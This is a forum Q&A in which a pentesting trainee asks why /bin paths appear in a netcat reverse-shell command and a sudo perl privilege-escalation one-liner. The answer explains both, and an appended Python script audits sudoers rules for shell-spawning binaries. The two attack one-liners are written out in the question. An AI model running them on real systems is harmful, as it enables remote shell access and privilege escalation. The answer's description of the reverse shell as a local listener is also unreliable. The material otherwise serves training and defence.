
During my pentester training, I have noticed /bin/ being used a lot in some situations and in certain commands, such as in a reverse shell:

nc -nv 192.168.0.6 1234 -e /bin/bash

and, for example, when it comes to escalating privileges on a machine:

sudo /usr/bin/perl -e 'exec "/bin/sh"'

I have searched the internet and watched several videos, but they never explain how this folder works in these situations: WHY I need to run /bin/bash when opening a reverse shell, or why /bin/perl and /bin/sh were used?

Vinni Marcon

1 Answer


Pentesting is all about using the tools available to you in order to accomplish a goal.

In your first example, you're opening a reverse shell. We listen for an incoming connection with netcat, but we want to do more than listen - we want that incoming shell to be interactive. To do that, we use the -e option to pipe the incoming connection to our local bash prompt. You could just as easily use sh or zsh or whatever you have in this situation. It should be noted that the -e option is not present on most netcat installs, so this is just one example of a reverse shell, and you should have many ready to go - some will work and some won't.

In your second example, we're escalating privileges with perl, a binary we found we can access on the remote machine without elevated privileges. We ultimately want to interact with the remote host at higher privileges than we already have, and in many cases something like perl may do that for us (for many arbitrary reasons too!). We can take advantage of this fact, combined with the fact that perl lets us run arbitrary code, to run a snippet of perl code:

exec "/bin/sh"

The exec command in perl will run an executable, in our case the /bin/sh shell. This shell will run at perl's privilege level, so we've effectively opened a shell at higher privileges than we had previously.

Perl's -e option is invoking a script or line of perl to run, and it is just coincidence that both commands have -e. They mean separate things.

Takeaway: There are many reasons you'll be entering commands to do various things. There's a ton of reverse shells, an infinite amount of ways to escalate your privilege, and a million different enumeration techniques. As you're given commands to run, take a minute to check the documentation for the command to find what each flag does, why you're using those parameters, and how it's working. Taking notes as a pen tester will move you forward faster than any other technique, because pentesting is a numbers game - you want to try as many things as possible to see what works.

ZachChilders
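The answer's privilege-escalation point, that a sudo rule for perl (or any shell) is in effect a sudo rule for /bin/sh because the interpreter can exec a shell at its own privilege level, has a defensive counterpart: auditing sudoers for such rules. The checker below is added example code, not part of the original question or answer; the simplified sudoers grammar it parses, the list of shell-spawning binaries (the ones named on this page) and the sample rules are all constructed assumptions.

```python
"""Audit sudoers-style rules for commands that can hand out a shell: a rule
for perl, sh, bash, zsh or nc is effectively a shell at that privilege."""
import os
import re

# Binaries discussed on the page that yield a shell directly or via exec.
SHELL_SPAWNERS = {"sh", "bash", "zsh", "perl", "nc"}
# who  host=(runas) [TAG:] cmd1, [TAG:] cmd2 ...   (simplified sudoers grammar)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.*)$")
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, PASSWD:, SETENV: ...

def risky_rules(sudoers_text):
    """Return (who, runas, command, nopasswd) for each shell-capable command."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if not m:
            continue
        nopasswd = False
        for cmd in m.group("rest").split(","):
            cmd = cmd.strip()
            tag = TAG_RE.match(cmd)
            if tag:  # a tag applies to this and every following command
                words = tag.group(0).replace(":", " ").split()
                if "NOPASSWD" in words:
                    nopasswd = True
                elif "PASSWD" in words:
                    nopasswd = False
                cmd = cmd[tag.end():].strip()
            binary = os.path.basename(cmd.split()[0]) if cmd else ""
            if cmd == "ALL" or binary in SHELL_SPAWNERS:
                findings.append((m.group("who"), m.group("runas") or "root", cmd, nopasswd))
    return findings

# Constructed sample, not taken from any real host.
SAMPLE_SUDOERS = """\
Defaults    env_reset
root        ALL=(ALL:ALL) ALL
%admin      ALL=(ALL) ALL
deploy      ALL=(root) NOPASSWD: /usr/bin/perl, /usr/bin/systemctl restart app
backup      ALL=(ALL) NOPASSWD: /usr/bin/rsync, PASSWD: /bin/bash
www-data    ALL=NOPASSWD: /usr/bin/nc -l 8080
"""

if __name__ == "__main__":
    for who, runas, cmd, nopw in risky_rules(SAMPLE_SUDOERS):
        print(f"{who} may run '{cmd}' as {runas}" + (" without a password" if nopw else ""))
```

On the sample, the perl, bash and nc rules are flagged while the rsync and systemctl rules are not, which is exactly the distinction the answer draws: a binary that can exec a shell is as dangerous as the shell itself.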